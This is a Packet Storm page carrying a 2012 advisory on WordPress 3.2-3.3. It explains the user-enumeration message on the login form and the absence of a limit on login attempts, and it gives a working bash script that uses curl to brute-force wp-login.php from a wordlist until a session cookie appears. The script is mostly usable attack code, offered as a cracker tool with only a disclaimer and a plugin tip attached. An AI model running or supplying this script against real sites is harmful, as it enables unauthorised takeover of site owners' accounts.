exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Bruteforce Script

WordPress Bruteforce Script
Posted Apr 29, 2012
Authored by CorryL

This is a simple bash script for bruteforcing WordPress.

tags | cracker, bash
SHA-256 | a04595fb1fae7483302800dc402320dae1656bd040d010c93927bb2d7e92208a

WordPress Bruteforce Script

Change Mirror Download
-=[--------------------ADVISORY-------------------]=-

WordPress BruteForce Script

Author: Corrado Liotta Aka CorryL [corryl80@gmail.com] #x0n3-h4ck will
never die#
-=[-----------------------------------------------]=-


-=[+] Application: WordPress
-=[+] Version: 3.2-3.3
-=[+] Vendor's URL: Wordpres.org
-=[+] Platform: Windows\Linux\Unix
-=[+] Bug type: BruteForce
-=[+] Exploitation: Remote
-=[-]
-=[+] Author: Corrado Liotta Aka CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Facebook: https://www.facebook.com/CorryL
-=[+] Twitter: https://twitter.com/#!/CorradoLiotta
-=[+] Linkedin: http://it.linkedin.com/pub/corrado-liotta/21/1a8/611
-=[+] +Google: https://plus.google.com/u/0/109396477464303670923

...::[ Descriprion ]::..

What I am about to describe is not a new thing, but I wanted to create
this simple script,
to show how easily it is possible to violate famous as a cms wordpress,
unfortunately like most of you know wordpress has some minor problems
related to the security module login,
in practice as you will see in the picture any user can discover a
user actually
exists simply trying to enter any passwords, because if the CMS
recognizes that the user is present
in the database but the password is wrong return this message "the
password for the admin user is not correct ",
so this makes us understand that the admin user exists,
and that you need only enter the correct password. Another small flaw
security of this CMS
is that it has no control on the default login attemps,
this allows a attaker do not want all the attempts that never stopped coming,
a TIP that I give to all those who use this cms is to install a plugin
for login attemps,
we find several directories inside the plugins wordpress.org




...::[ Proof Of Concept ]::..

Image: http://img832.imageshack.us/img832/4481/wordpressbrute.jpg

...::[ Script ]::..

#!/bin/bash
echo "Wordpress Bruteforcing By Corrado Liotta Aka CorryL"
# Questo script è stato creato a scopo illustrativo.
# Non mi ritengo responsabile sull'uso inappropriato.
# La violazione di sistema informatico non autorizzato
# è punibile per legge Art. 615 Ter
# Installa sul tuo blog wordpress un plugin per il login attemp.
echo "Username"; read USER;
echo "Wordlist Password"; read WLIST;
echo "Sito Web"; read WEB;


while read line
do
echo "---> TESTING ${line} per l'utente $USER"
curl --output test.html --cookie-jar c.cookie --data
"log=$USER&pwd=${line}&wp-submit=Collegati&redirect_to=http%3A%2F%2F$WEB%2Fwp-admin%2F&testcookie=1"
"http://$WEB/wp-login.php"
cat c.cookie>COOK
PARSE=$(cat test.html |grep "La password inserita per l'utente")
CHECK=$(cat COOK|grep "#HttpOnly")
if [ "$CHECK" != "" ]; then
echo "--> Utente $USER PASSWORD TROVATA ! --> ${line} "
break
else
echo "--> Utente $USER PASSWORD Non Trovata !"
fi


done < $WLIST



..::[ Disclousure Timeline ]::..

[29/04/2012] - Public Disclousure

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close